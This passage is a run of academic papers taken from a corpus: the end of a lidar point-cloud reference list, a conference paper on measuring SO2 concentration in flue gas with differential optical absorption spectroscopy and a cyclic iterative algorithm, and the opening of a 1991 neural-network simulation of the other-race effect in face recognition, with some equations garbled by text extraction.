2012:167-172. [29] Li Minglei, Liu Shaochuang, Yang Huan, etc. A Two-level Optimized Lidar Point Cloud Scene Segmentation Method. Journal of Surveying and Mapping, 2018, 47 (2): 269-274. [30] ANDONI A, INDYK P. Near-optimal Hashing Algorithms for Approximate Nearest Neighbor in High Dimensions[C]//Proceedings of the 47th Annual IEEE Symposium on Foundations of Computer Science. Berkeley, CA, USA: IEEE, 2006:459-468. [31] YU Yongtao, LI J, GUAN Haiyan, et al. Learning Hierarchical Features for Automated Extraction of Road Markings from 3-D Mobile LiDAR Point Clouds[J]. IEEE Journal of Selected Topics in International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 71 Applied Earth Observations and Remote Sensing, 2015, 8(2): 709– 726. [32] PANG Guan, NEUMANN U. Training-based Object Recognition in Cluttered 3D Point Clouds[C]. Proceedings of 2013 International Conference on 3D Vision-3DV 2013. Seattle, WA, USA: IEEE, 2013:87-94. [33] Yang Bisheng, Mei Baoyan. Research on 3D City Model Visualization [D]. 2000. [34] Qi C R, Su H, Mo K, et al. Pointnet: Deep learning on point sets for 3d classification and segmentation[C]. Proceedings of the IEEE conference on computer vision and pattern recognition. 2017: 652- 660. [35] Zhao Zhongyang, Cheng Yinglei, Shi Xiaosong, et al. LiDAR point cloud feature classification method based on multi-scale features and PointNet [J]. Progress in Laser and Optoelectronics, 2019, 56 (5): 052804. [36] Niu Chengeng, Liu Yujie, Li Zongmin, et al. Method of 3D target recognition and model segmentation based on point cloud data [J]. Journal of Graphics, 2019, 40 (2): 274-281. work_ewm74zd5kzarrgihs43w6s6mxq ---- 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 80 Research and Application of SO2 Concentration Monitoring Algorithm in Flue Gas Wang Qinqin School of Computer Science and Engineering Xi’an Technological University Xi’an, 710021, China e-mail: 1466122350@qq.com Su Xiaohui School of Computer Science and Engineering Xi’an Technological University Xi’an, 710021, China e-mail: 287099144@qq.com Abstract—This paper mainly focuses on the concentration calculation of SO2 in flue gas. There are many methods for smoke detection. First of all, this paper mainly introduces the basic Differential Optical Absorption Spectroscopy technology. Then, in order to solve the problem of overlapping absorption between different gases in the flue gas, this paper use cyclic iteration algorithm to measure the concentration of SO2. It is concluded that the basic DOAS algorithm has a large error for the concentration measurement of mixed gas with overlapping absorption, the he error is above 25%. However, the cyclic iterative algorithm has a good effect on processing with it which can get a more stable result after three iterations, and the measurement error can be controlled finally within 2%. Keywords-Differential Optical Absorption Spectroscopy; SO2 Monitoring; Mixed Gas; Spectral Overlap Absorption; Cyclic Iterative Algorithm I. INTRODUCTION With the rapid development of industrialization and human destruction, their pollution is becoming more and more serious. Therefore, monitoring the harmful gases of the atmosphere is the primary prerequisite for controlling and treating pollution. At present, people mainly use portable gas analysis equipment to carry on flue gas analyze, and The Differential Optical Absorption Spectroscopy (DOAS) is the most commonly and effective method which is used to real-time detect gas concentrations in the atmosphere by characteristic absorption of absorbable molecules in the near ultraviolet region[1]. The traditional DOAS algorithm exist large errors for the gas concentration measurement of short path and low concentration. In order to decrease limit of detection and enhance environment adaptability of the portable flue gas analyzer, to improve measurement accuracy, Wang Kunpeng completed the research and design of portable gas analyzer based on AVR micro-controller, and increase it’s detection accuracy and environmental adaptability[2]. Deng Meng developed the portable gas analyzer based on the non- dispersive ultraviolet absorption, and has improved resolution and stability in high humidity and low concentration of SO2 gas monitoring[3].Wang Jing designed concentration calculation method based on the least square method on the basis of DOAS algorithm, which is used in the short optical path and a low SO2 calculation[4]. Zhou Mi proved the monitoring accuracy of Fourier infrared method for the low concentration SO2 in straw burning flue gas[5]. Yan Yue’s experiment has proved that BP neural network based on adaboost optimization algorithm has a good effect in monitoring concentration of SO2 gas with interference[6]. In order to separate and calculate the gas concentration from the absorption spectrum signal of the mixed gas, Xu Shuping designed the portable smoke analyzer based on the cyclic iteration algorithm. It conclude that the method can simultaneously calculate various gas concentration and has strong anti-interference ability[7]. Wang Yingjian designed Strong independence and multi-scale wavelet discrete decomposition method, and obtained accurate concentration of SO2 with NO gas absorption interference [8]. In the paper, a portable flue gas analyzer is used as an experimental instrument to study the method of measuring the SO2 content in the exhaust emission of the factory. The 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 81 experiment mainly research on the DOAS absorption model and the cyclic iterative algorithm. It can get the efficient method on SO2 concentration measurement in the mixed gas. So, it can provide the best technical support for the factory exhaust emission monitoring and reduce the air pollution. II. DIFFERENTIAL ABSORPTION SPECTROMETRY Differential absorption spectroscopy is proposed by U.Platt of the Institute of environmental physics at Heidelberg University in Germany. The basic principles are as follows: Firstly, It need irradiate the tested substance with a beam of light, ten, select the corresponding absorption wavelength of the gas, lastly, calculate the gas absorbance and then get its concentration. The theory is based on the Lambert-Bee law. A. Lambert-Beer Law The basic principle of Lambert-Beer law: when abeam of parallel monochromatic light through a certain absorbable material in the vertical direction and generate transmission, the medium itself will absorbs a part of light, so, the original intensity weakened, and the thicker the medium, the higher the concentration, the greater decreases the light intensity [9]. The specific expression is as follows: KLC I I A  1 0log  Among them, A is absorbance, I0 is the intensity of incident light, I1 is transmission light intensity, Kis constant, absorption coefficient, Lis the thickness of medium, C is the concentration of absorption material. Set I0(λ) as the original light intensity, I(λ) as receiving light intensity and σ(λ) as the absorption cross section of the gas to be measured, then the mathematical model of the spectral absorption of a single gas can be expressed as: )](exp[)()( 0   CLI I  Lambert-Beer law is used only for the concentration measurement of single gas and it requires no interference in the experimental environment. However, in the actual measurement process, the measured material is usually a mixture materials which concluding kinds of interfere with the impurities such as sols and solid particles. B. Actual Spectral Absorption Model Due to the uneven refractive index, when the light incident into the uneven medium, it will produce scattered light and reduce the transmittance of light, including Rayleigh scattering and Mie scattering which are show broadband absorption and narrowband absorption in the optical spectrum chart. Therefore, it is necessary to establish a spectral absorption model under actual conditions. Set i as the type of gas, and introduce the extinction coefficient of gas including  R and  M . The model of the gas absorb light is as follows:       ]exp[)()( 0   MRiiCLII    When analyzing and calculating, the absorption cross section will be decomposed into fast parts and slow parts. So, The High pass filtering will avoid the influence of Rayleigh scattering and Mie scattering. Set the absorbance of the gas to be measured is D, the actual absorbance model is finally as follows:   )(])()(ln[ 0   iiCI LID   From the formula 4, It can be known that the difference optical density  D is linear with the differential absorption cross section  i in a certain concentration range. Although the differential absorption method can accurately calculate the concentration of most of the gases, the loss of the slow change absorption spectrum information in the filtering process will lead to produce some wrong results for gas concentration measurement. Therefore, it is necessary to study other methods of concentration inversion to improve the measurement precision of gas composition. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 82 III. CYCLIC ITERATIVE ALGORITHM The absorbance has Superposition property. When the gases is used as a mixture, the total absorbance is equal to the sum of the absorbance of each component in the mixture if each kind of gas has a absorption of the light in a particular wavelength[10]. According to the superposition property of absorption spectrum, the cyclic iteration algorithm can gradually eliminates the interference between gas molecules through successive cycle calculation, and finally approach the real concentration of the gas. C. The Model of Cyclic Iterative Algorithm The paper mainly research the concentration measurement of SO2 of mixed gases with overlapping absorption characteristics. The experiment only consider the interference of NO2 on spectral absorption of SO2 in the range of 200nm~300nm band of the near ultraviolet region. Two standard gases of SO2 and NO2 are added one by one, the absorption spectra of two kinds of gases are shown in Figure 1. 190 200 210 220 230 240 250 260 270 280 290 300 0 10000 20000 30000 40000 50000 60000 In te n si ty (c o u n ts ) Wavelength(nm）零气线 NO2 SO2 Figure 1. Absorption spectrogram of SO2 and NO2. As shown in Figure1, although both NO2 and SO2 have the absorption of light at wavelength 230nm and 270nm, the absorption intensity is very different. The absorbance of NO2 at 230nm is much greater than that of its absorbance at 270nm, while the absorbance of SO2 at 270nm is much greater than that of its absorbance at 230nm [9]. Therefore, at 230nm, the absorption of NO2 can be seen as the main absorption and the absorption of SO2 as an interference. On the contrary, at the wavelength of 270nm, the absorption of SO2 can be seen as the main absorption, and the absorption of NO2 as the interference of the main absorption of SO2. The basic calculation steps of the cyclic iteration method are as follows: At 230nm, the total absorbance (A1) is considered as the absorbance of NO2 (AS1). Step 1, at 230nm,according to AS1, it can obtain the concentration of NO2 (CS1) by looking up the table; Step 2, at 270nm, according to Cs1. it can obtain was to the absorbance of NO2 (AS2); Step 3, at 270nm, the total absorbance (A2) minus AS2 is equal to the absorbance of SO2 (AN2); Step 4, at 270nm, it can obtain the concentration of SO2 (CN2) by looking up the table; Step 5, at 230nm,according to CN2, it can obtain the absorbance of SO2 (AN1) by looking up the table; Step 6, at 230nm, A1 minus AN1is equal to the absorbance of NO2 (AS1); Repeat steps one to six, it can get the exact values of SO2 concentration. The above algorithm flow can not only calculate the concentration of each component of the mixture gases which include SO2 and NO2, but also it is suitable for concentration measurement of any mixed gas. IV. DESIGN OF EXPERIMENTAL SYSTEM The experimental system is mainly composed of light source, spectrometer, optical fiber and computer. Firstly, open the light source, and the emitted light of the optical fiber pass through a double convex lens, after that, it becomes parallel light and pass through the measured gas. Next, the light enters into the spectrometer after focusing through the focusing lens. Lastly, the spectrometer converts the optical signal into electrical signal and sends it to the computer to collect and process the spectral signal. The specific experimental device and system flow are shown in Figure 2 and Figure 3. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 83 Figure 2. Experimental device diagram. Gas entry Air chamber Exhaust fume Spectrometer Computer UV light source Optical fiber Data line Optical fiber Figure 3. Flow chart of the experimental system. In the experiment. Firstly, it measured the dark spectrum when the light source does not pass into the spectrometer. Then, add the gas and open the light source, so that the light can enter the air chamber through the optical fiber. After the gas was absorbed, the number of photons will decrease correspondingly, and the number of absorbed photons will change with the change of gas concentration. Finally, the transmission light goes into the spectrometer, converts the light signal into the electrical signal, and sends it to the computer to display the spectrum. It can obtain original absorption spectrum after calculation the average value of absorption spectrum for many times. From the original spectra deducted the data of dark spectrum, it can get the actual spectrum. V. EXPERIMENTAL RESEAECH AND RESULT ANALYSIS In order to verify the feasibility and practicability of DOAS and cyclic iteration algorithm, we will compare the result and accuracy of them through experiments, and summarize the advantages and disadvantages of each algorithm. D. Research on Curve Fitting Lambert-Beer law provides a linear relationship between gas absorbance and concentration. In practice, the linear relationship is not always true due to the influence of various factors. Therefore, the curve fitting method is used to fit the measured data. In order to improve the efficiency of the algorithm, the number of photons absorbed by the experiment is first converted into the absorption intensity. Because the dark spectrum is included in the spectrum after the light is passed into the light source, therefore, In calculating the absorbance and concentration of the substance to be measured, the dark spectrum should be removed from the original spectrum. The calculation model of absorbance is as follows:   DS DR A    lg  Among them, A is an absorbance, R is a number of incident photons, S is a number of transmitted photons,  is a wavelength, D is a dark noise. In this paper, the effect of NO2 on the absorption spectrum of SO2 is only considered. The mixture of NO2 and SO2 is used in the experiment, and there are two kinds of standard gas concentration, such as 100ppm and 500ppm. It can fit the concentration and absorbance curves of each gas at a certain wavelength by the measured gas absorption spectra, and then obtain the fitting data relation table of each gas. The fitting formula is as follows:  PCCC C A CA i i i   2i2i2i2i  Among them, p is the change rate of average absorbance along with increasing concentration, Ci+2 is the gas concentration, 2iA is a absorbance of gas to be measured. As long as there are two points ii CA  1i1i  CA on the measured curve, the relationship between concentration and absorbance can be fitted. At 230nm and 270nm,the relationship figures between concentration and absorbance of SO2 and NO2 can be obtained by using excel, respectively. As shown in Figure 4 and 5 (horizontal coordinate is concentration, ordinate is absorbance). 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 84 Figure 4. Data relationship between concentration and absorbance of NO2. Figure 5. Data relationship between concentration and absorbance of SO2. E. Experimental Results and Analysis In the experiment, firstly, we should turn off the light source and measure the dark spectrum. Then, measure the original spectrum. Finally, two kinds of mixed gas with different ratio of SO2 and NO2 are introduced to measure the spectral data. The mixed concentrations of SO2 are 301ppm and 102ppm, respectively. The mixed concentrations of NO2 are 199ppm and 498ppm, respectively. Then, the concentration of the measured spectral data is respectively calculated by using DOAS and cyclic iterative algorithm. The SO2 concentration under the interference of NO2 as shown in Table I. The iterative results of cyclic iteration algorithm are shown in Table II. TABLE I. THE COMPARISON OF MEASURED CONCENTRATION WITH ACTUAL VALUES OF SO2 Computational Method Standard Value 301 Standard Value 102 Measured value Measured deviation(%) Measured value Measured deviation(%) DOAS 368.35 22.3% 128.07 25.5% Cyclic iterative algorithm 298.71 0.7% 100.46 1.5% TABLE II. THE RESULTS OF CYCLIC ITERATIVE ALGORITHM Iterations 1st time 2nd time 3rd time 4th time FirstGroup SO2 (ppm) 310.24 299.86 299.71 299.71 NO2 (ppm) 193.83 201.47 201.47 201.47 Second Group SO2 (ppm) 134.71 101.90 101.46 101.46 NO2 (ppm) 487.62 497.36 497.64 497.64 In the experiment, DOAS and cyclic iteration algorithms are used to invert the concentration of SO2 in the mixture gas respectively. According to Table I, under the interference of NO2 gas, with the increase of NO2 concentration, the greater the deviation, the lower the measurement accuracy. It is shown that the error is more than 25% when the DOAS method is used to measure the SO2 concentration in the mixed gas. Combined with Table I and Table II, the results show that the inversion effect of DOAS method for the mixture gas concentration with overlapping absorption is not satisfactory. On the contrary, the accuracy of the cyclic iteration algorithm is the highest, and the content of the mixed components can be accurately measured 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 85 by only three cycles, and the measurement deviation is finally within 2%. VI. SUMMARY OF THE PAPER In order to find a method with high detection accuracy and good calculation efficiency, this paper mainly study the concentration monitoring method of SO2 in flue gas. First, the advantages and disadvantages of the current equipment and algorithm of smoke composition detection can be obtained. Then, the basis theoretical and calculation principle of DOAS are introduced in detail. Next, according to the actual detection environment, a cyclic iterative algorithm is designed for the spectral absorption characteristics of measured gas. Finally, the spectral data are obtained through experiments, and use the DOAS method and cyclic iteration algorithm to calculate the concentration of SO2. It is concluded that the cyclic iteration algorithm is superior to the content monitoring of SO2 in flue gas, and greatly reduces the calculation deviation, finally control the error within 2%. The cyclic iteration algorithm is not only suitable for the concentration monitoring of the gas in the paper. It has a high accuracy for the detection of exhaust gas emissions in industrial production, especially for the concentration measurement of the of various components in the mixed gases with overlapping absorption spectra. The study results provide a good technology for industrial development and environmental protection. It make the factory exhaust gas to reach the safety target, and reduce the air pollution. ACKNOWLEDGMENT Provincial Science and Technology Project, Shaan’xi Provincial Education Department Project (15JF019). REFERENCES [1] Sun Liqun, Chen Kexin, Yang Huadong, “On-line detection of atmospheric trace gases based on differential absorption light spectrum,” J.Applied Optics, Vol.33, No.1, Jan.2012, pp.115-119. [2] Wang Kunpeng, Wang Xianzhong, Design of Portable smoke detector based on AVR Microcontroller. D. Zhengzhou: Zhengzhou University, 2013. [3] Deng Meng. “Application and research of portable flue gas analyzer based on non-dispersive ultraviolet absorption method in flue gas sulfur dioxide monitoring,” J. Comprehensive Utilization of Chinese Resources, Vol.34, No 2, Feb.2016, pp.23-26. [4] Wang Jing, Huang Yunbiao, “ The study on low concentration SO2 On-line Monitoring Technology based on DOAS,” J.Optics Technology, Vol.42, No.6, Nov. 2016, pp.567-570. [5] Zhou Mi, Yang Xi, Zhang Minghui,“Discussion on the monitoring method of sulfur dioxide in sinter smoke,” J.Fine Chemical Intermediate, Vol.47, No.2, Apr.2017, pp.68-72. [6] Yan Yue, Yan Shi, Yang Yongbin,Jiang Bin, “Application ofAdaboost integrated BP neural network in the detection of SO2 concentration in thermal power plant,”Transducer and Micro-system Technologies, Vol.35, No.9, May.2016, pp.148-151. [7] Xu Shuping, Liu Yushu,“A portable gas analyzer based on cyclic iterative algorithm,” J. Journal of Xi'an Technological University, Vol.33, No.7, Jul.2013, pp.543-548. [8] Wang Yingjian, Feng Hailiang,Concentration monitoring of mixed gas of Sulfur dioxide and nitricoxide based on UV absorption spectrum, D. Chongqing: Chongqing University, 2016. [9] Jiang Xuqian, Wang Qingbao, Design of portable ultraviolet flue gas analyzer, D. Nanjing: Nanjing University of Science and Technology , 2012. [10] Chen Bin, Wang Zhihua, Design of UV flue gas analyzer,D. Nanjing: Nanjing University of Science and Technology, 2013. work_ezwbhq2nrvadncyjpwjlluuona ---- Connection Science, 1991, 3(2), 163–178. Simulating the “other-race effect” as a problem in perceptual learning Alice O’Toole The University of Texas at Dallas Ken Deffenbacher The University of Nebraska at Omaha Hervé Abdi The University of Texas at Dallas Jim Bartlett The University of Texas at Dallas We report a series of simulations on the well-known “other-race effect.” We trained an autoassociative network on a majority and a minority race of faces, and tested the model’s ability to process faces from the two races in different ways. First, the model was better able to reconstruct unlearned majority faces than minority faces. Secondly, the average inter-face similarity was higher for the reconstructed minority faces than for reconstructed majority faces, indi- cating that the model was coding the majority faces more distinctively than the minority faces. These results held for Caucasian faces as the majority race and Japanese faces as the minority race and vice versa. Thirdly, we simulated a recognition task for same- and other-race faces by using a face history matrix and a recognition task matrix with equal numbers of Caucasian and Japanese faces, and reconstructing these faces as a weighted combination of the two matrices. Using Caucasian faces as the majority race, the model was better able to discriminate learned from new Caucasian faces than learned from new Japanese faces. We discuss the results in terms of perceptual tuning to information useful for processing faces of a single race. Keywords:Face memory, autoassociative memory, neural network, other-race effect. . Introduction For many years scientist and layperson alike have suspected that faces of one’s own race are Thanks are due to June Chance and Al Goldstein for providing the Caucasian and Japanese faces used in the simulations, and to Peter Assmann, Barbara Edwards and two anonymous reviewers for helpful comments on an earlier version of this manuscript. This project was supported in part by National Institute of Aging Grant RO1-AG07798 to J.C.B. Send correspondence about this paper to Hervé Abdi: herve@utdallas.edu. Home page: http://www.utdallas.edu/∼herve. recognized more accurately than faces of another race. In the early part of the century, Feingold (1914,p. 50) stated the supposition and a plausible reason for its existence this way other things being equal, individuals of a given race are distinguishable from each other in proportion to our familiarity, to our contact with the race as a whole. Thus, to the uninitiated American all Asi- atics look alike, while to the Asiatic, all White men look alike. More recently, it has been shown that approxi- mately half of potential jurors believe that such a bias exists (Deffenbacher & Loftus, 1982). Indeed, abundant empirical support for the own-race bias in face recognition accuracy can be found in the recent meta-analyses of a large number of studies 163 164 O’TOOLE, DEFFENBACHER, ABDI, & BARTLETT on the topic (Shapiro & Period, 1986; Bothwell et al., 1989). Several hypotheses have been advanced to ac- count for the cross-race phenomenon: Faces of some races are inherently more difficult to identify than others; prejudicial attitudes lead to less ac- curate recognition for other-race faces; and other- race faces are processed more superficially than same-race faces. There is little support for any of these accounts (Brigham, 1986). A fourth possi- bility is that implied by the quote from Feingold (1914): an own-race bias is in direct proportion to the difference in amount of contact with persons of one’s own and another race. Several studies have found a smaller other-race effect for persons living in more racially integrated circumstances (Cross et al., 1971; Feinman & Entwistle, 1976). However, while at least one study (Brigham et al., 1982) yielded a small but significant correlation of self-reported degree of cross-race contact and cross-race recognition ability, other studies (e.g. Brigham & Barkowitz, 1978) have found no rela- tionship at all. It may be, however, that current techniques are not sensitive enough to adequately assess the quan- tity and quality of contact with persons of another race. There are data which suggest that the cross- race effect may indeed be a matter of differen- tial exposure to faces of different races. For one thing, a number of attempts to improve same-race face recognition have all failed (Malpass, 1981). However, similar training efforts for other-race face recognition have yielded improvements (e.g. Goldstein & Chance, 1985). We think that the differential effects of further training in face recognition are due to differen- tial amounts of perceptual learning associated with same versus other-race faces. A cross-sectional study of the development of face recognition abil- ity by Chance et al. (1982) found that 6 year old Caucasian children show only a small cross-race effect recognizing Japanese compared with Cau- casian faces. At successively older ages up to early adulthood, ability to recognize both races in- creased, but ability to recognize same-race (Cau- casian) faces increased much more rapidly. Hence, any attempt to improve same-race face recogni- tion by short-term training programs may be inade- quate compared with years of extensive processing of same-race faces. Studies examining the role of perceptual learn- ing1 in the other-race effect are difficult to carry out empirically for two reasons. First, while it may be possible to find subject populations with a relatively controlled “face-learning” history, it is generally not possible to equate the populations along other important cultural and social dimen- sions that may affect performance on the task. Sec- ondly, as we have already noted, short-term per- ceptual learning studies involving practice with a single race of faces are not necessarily adequate to control for the lifetime experience of observers with faces of their own race. These methodological difficulties make the cross-race effect an ideal can- didate for simulation approaches to understanding the psychological data. In the present study, we present simulations of a perceptual learning account of the other-race ef- fect that is based on the following principles. First, we assume that faces of different races comprise different statistical categories of faces. Secondly, within a given category of faces, a set of differen- tially weighted “features2” is optimal for encoding faces in a manner that makes faces within the cate- gory most discriminable. Different feature sets and weightings, however, are optimal for processing faces from other-race categories of faces. Thirdly, with exposure to many faces of a given race and a smaller number of faces of other races, perceptual learning enables observers to make optimal use of the features that are best for processing faces from the category with which they have had the most experience, topically, faces of their own race. By this account, the difficulties experienced with faces of another race are due to the fact that the optimal features for distinguishing faces of one’s own race are not optimal in processing the faces of another race. One way to simulate the other-race effect is to train an autoassociative network on different pro- portions of faces of an ’own’ and ’other’ race. We 1 Referred to in the face recognition literature simply as “experience.” 2 The word features is used in its most general sense without commitment to a specific definition. SIMULATING THE OTHER-RACE EFFECT 165 trained an autoassociative system on a large num- ber of faces of a majority race and a smaller num- ber of faces of a minority race to mimic the other- race effect. The advantages of an autoassociative memory used with Widrow-Hoff error correction is that it will develop connection weights in such a way as to optimize the storage capacity of the matrix. Thus, with very similar stimuli, such as a single race of faces, the model should tune itself to the information important for processing faces from within the class. Due to the distributed nature of the memory, when faces are retrieved from the system, they will be filtered by the learning history of the system. Several predictions about the system’s ability to process same- and other-race faces follow. First, when the network is trained on a majority of faces of one race and a minority of faces of another race, its ability to represent faces of the majority race should be better than its ability to represent faces from the minority race. This is due to the fact that model will have developed “features” that are more appropriate for faces of the majority race. We can assess the validity of this prediction by looking at the quality of face reconstructions for new (pre- viously unencountered) faces of the majority and minority races. Secondly, reconstructed new faces of the minority race should be more similar to one another than reconstructed faces of the majority race. In other words, the average inter-face sim- ilarity should be greater for reconstructed minority faces than for reconstructed majority faces. This is because the model will not develop a coding that makes optimal use of the distinguishing features for the minority race; hence, these faces should be “perceptually” more similar to one another. Fi- nally, the model should be better able to recognize majority faces than minority faces. The simulations serve, first, to test the model qualitatively as a face recognition tool with a much larger and higher quality stimulus set than that used previously (Kohonen, 1984; O’Toole et al., 1988; O’Toole & Abdi, 1989). We will look specifically at the model’s performance with re- spect to the predictions stated above. Secondly, this type of model suggests a differ- ent definition of features than has previously been used to characterize faces. Since the autoasso- ciative memory can be decomposed into a set of eigenvectors, and since faces learned by the model can be reconstructed by the weighted combina- tion of these eigenvectors, the eigenvectors may be thought of as features for characterizing the stimulus set. We should expect to see differences in eigenvectors based on the face history of the model. Furthermore, since we used a simple visual code in these simulations, the eigenvectors can be displayed as images. We shall discuss the potential role of the eigenvectors as features for characteriz- ing same-and other-race faces. Simulation 1 The model is defined first and then its applica- tion to the other-race problem is presented. A dig- itized image of each face was coded as a vector comprised of pixel elements concatenated from the rows of the face image. Thus, the ith face was rep- resented by a J × 1 vector (where J is equal to the width times the height of the face image in pixels) and is denoted by fi. For convenience, normalized vectors are assumed (i.e. fTi fi = 1). The autoasso- ciative matrix was constructed as A = ∑ i fif T i (1) Recall of individual faces from the matrix was done according to the rule f̂i = Afi (2) where f̂i is the system estimate of fi. The qual- ity of this estimate is measured by comparing the reconstructed image with the original image using the cosine of the angle between the vectors f̂i and fi. The Widrow-Hoff error-correction rule was ap- plied iteratively to optimize the quality of the recall across the stimulus set A[t+1] = A[t] − γ ( fi − A[t]fi ) fTi (3) where i is randomly chosen and γ decreases as the reciprocal of the iteration number. Since the eigen-decomposition of the autoasso- ciative matrix is equivalent to principal component analysis (Abdi, 1988), the autoassociative matrix 166 O’TOOLE, DEFFENBACHER, ABDI, & BARTLETT Figure 1. Mean cosines between original and reconstructed images for the OLD and NEW majority and minority faces. SIMULATING THE OTHER-RACE EFFECT 167 can give indications of the statistical structure of the stimulus set. The storage capacity of such a matrix is approximately 15% of its dimensionality for random vectors (Hopfield, 1984). Since the di- mension of our images was very large by compar- ison with the number of stimuli, this limit was not a problem for these simulations. Method Stimuli. A total of 319 Caucasian and Japanese faces were digitized from slides with a resolu- tion of 16 grey levels using a Fotovix digitizer attached to a 286-based computer with a 16-bit TARGA board (True Vision). Faces were of young adults and were roughly half male and half female. None of the slides pictured people with facial hair or glasses. The images were aligned so that the eyes were at about the same height. The images were cropped around the face to eliminate cloth- ing. Each face was 151 pixels wide and 225 pix- els long, and so was represented by a 33 975-pixel vector consisting of the concatenation of the pixels rows. A spatial differentiation encoding was used to enhance lines prior to the extraction of the pixel vector (cf. O’Toole et al., 1988). The simulations were carried out on a Sun MicroSystems SparcSta- tion and on a Convex C-1 Vector computer. Procedure. Two simulations of the other-race effect were performed: one used Caucasian faces as the majority race and Japanese faces as the mi- nority race, and the other used Japanese faces as the majority and Caucasian faces as the minority group. For the Japanese minority simulation, an associative memory was trained using error correc- tion on 95 Caucasian and five Japanese faces. For the Caucasian minority simulation 95 Japanese and five Caucasian faces served as the training set3. Results and Discussion Representations of majority and minority race faces. The model was tested by reconstructing the Japanese and Caucasian faces that the model learned (OLD), and by reconstructing a sample of Japanese and Caucasian faces not learned by the model (NEW). The cosine between the origi- nal and reconstructed image indicates the quality of the model’s representation of the face. Fig- ure 1 shows the mean cosines for the OLD and NEW majority and minority faces for the simu- lations. Three points are worth noting. First, in both simulations, the OLD stimuli (both Cau- casian and Japanese faces) were nearly perfectly reconstructed (mean cosine=0.98). This is a con- sequence of the fact that the capacity of the matrix was not challenged (cf. Hopfield, 1984, and be- low). We discuss below one method of degrading the performance of the model in a psychologically interesting way. Secondly, the average cosine for the reconstructed NEW majority faces was greater than the average cosine for the reconstructed NEW minority faces. This can be seen in the interaction in Figure 1. The differences between the quality of the reconstructions for majority and minority faces reflects the model’s greater success in coding or representing novel faces from the majority race than from the minority race. Finally, in both simulations, the cosines for the NEW faces did not reflect random performance for the model. In other words, the minority race faces were not completely unfamiliar stimuli for the model. This is a consequence of the fact that all faces share a general schema of features and so a given race might be best thought of as a subcate- gory of the general class of face stimuli. Similarity. We tested the prediction that novel majority faces are perceived by the model to be less similar to one another (i.e. more distinctive) than minority faces. An analysis of the similar- ity of the reconstructed NEW faces to one another was carried out. In this analysis, 50 randomly cho- sen NEW Caucasian faces and 50 randomly cho- sen NEW Japanese faces were reconstructed and the model’s estimate of each face was used for this similarity analysis. These stimuli can be thought of as filtered or “perceived” by the matrix trained with a majority and minority race. For each race of faces, the inter-face similarity for the recalled faces 3 The choice of 95% majority and 5% minority faces is arbitrary. We have carried out the first set of sim- ulations with 75% and 25%, as well, and have found qualitatively similar, though less extreme, results for the model’s ability to represent new majority and minority race faces. 168 O’TOOLE, DEFFENBACHER, ABDI, & BARTLETT was calculated by taking the cosine between all possible pairs of different ‘perceived’ faces. The cosine between two faces indicates the similarity between the two, with identical or scaled faces yielding cosines of 1.0. The average similarity of all possible pairs of reconstructed faces was taken as the average inter-face similarity. Several conditions were analyzed. For each ma- jority simulation, the average inter-face similarity of Caucasian and Japanese faces was computed. Furthermore, the reconstructions were carried out using different numbers of eigenvectors to look at the consistency of the similarity effects. To ex- plain this latter analysis, a short digression into the properties of associative matrices is necessary. The reconstruction of any face from the autoas- sociative matrix can be achieved either by Equa- tion (2) or, equivalently, by taking a weighted sum of the eigenvectors of the matrix A, where the weights of each eigenvector for a face fi are equal to the dot-product between the face vector and the eigenvector (multiplied by the eigenvalue of the eigenvector—when error correction is not being used, since error correction has the effect of equal- izing the eigenvalues). For these simulations, error correction was used and so the eigenvalue was not included in the weights. Thus, the reconstruction is given by f̂i = (fi · e1)e1 + (fi · e2)e2 + . . . . . . + (fi · e`)e` + ··· + (fi · en)en (4) where e` indicates the `-th eigenvector. The reconstruction of each face, then, can be quantified precisely by this list of coefficients and the set of eigenvectors of A4. Returning from our digression, it is dear that a face may be recalled using this second procedure with all or any subset of eigenvectors. Since eigenvectors can be ordered by importance of contribution using their associ- ated eigenvalues, we recalled faces using different numbers of eigenvectors to test the consistency of the results as more eigenvectors were included. The results of this analysis appear in Figure 2 (a) for the Caucasian majority simulation and in Figure 2 (b) for the Japanese majority simulation. Average interface similarity, as defined by the av- erage cosine between all possible pairs of recon- structed faces ( as coded by the set of coefficients used to reconstruct them), appears on the y axis and number of eigenvectors is plotted on the x axis. In both simulations, faces from the minority race were more similar to one another on the average than were faces in the majority race. Thus, when the model is trained on a majority of faces of one race and a minority of faces of another race, it cre- ates more distinct codings of majority race faces. This finding is reminiscent of Feingold’s (1914) quote. Simulation 2 As previously noted, the capacity of an autoas- sociative memory without error correction can be estimated as approximately 15% of its dimension- ality. This estimate assumes random vectors. The vectors we used were of dimensionality 33 975 and so the capacity of the memory should be roughly 5096 faces. While there are two differences be- tween these simulations and those for which the capacity estimates were derived, these have inverse effects on the capacity estimates. First, we used error correction, which improved the capacity of the matrix. Secondly, faces are not random vectors but are highly correlated, a factor that lessens the capacity. In any ease, it is clear from Simulation 1 that 100 faces did not challenge the capacities of the matrix. Since we had a limited data base of faces, we explored a number of methods for de- grading the system’s performance. At least one of these is interesting psychologically and would merit attention regardless of the performance con- straints. This method draws on the metric multidi- mensional sealing analogy cited previously. Multidimensional scaling tries to represent space relations between entities of a stimulus set in the smallest dimensional space possible while accounting for some experimenter-set criterion of variance. The eigenvectors of an associative mem- 4 A strong analogy with metric multidimensional scaling is present here. The axes or dimensions of met- ric multidimensional scaling solutions are the eigen- vectors ordered by the magnitude of their associated eigenvalues. Thus, the first axis is the first eigenvec- tor, etc. Typically, multidimensional scaling solutions use as many axes as are needed to account for some experimenter-specified proportion of variance. SIMULATING THE OTHER-RACE EFFECT 169 Figure 2. Average inter-face similarity for the (a) Caucasian and (b) Japanese majority (95%) simulations, plotted as a function of the number of eigenvectors used to reconstruct the faces. The minority (5%) race faces for both simulations are more similar to one another than are faces in the majority race. 170 O’TOOLE, DEFFENBACHER, ABDI, & BARTLETT ory are equivalent to the axes of a multidimen- sional scaling solution, with the eigenvector with the largest positive eigenvalue accounting for the largest proportion of variance, and the eigenvector with the second largest eigenvalue accounting for the second largest proportion of variance, and so on. The maximum number of dimensions needed to account for all of the variance is equal to the rank of the matrix (i.e. the number of eigenvectors with non-zero eigenvalues). Frequently in multi- dimensional scaling, however, an acceptably large proportion of the variance may be accounted for by a very small 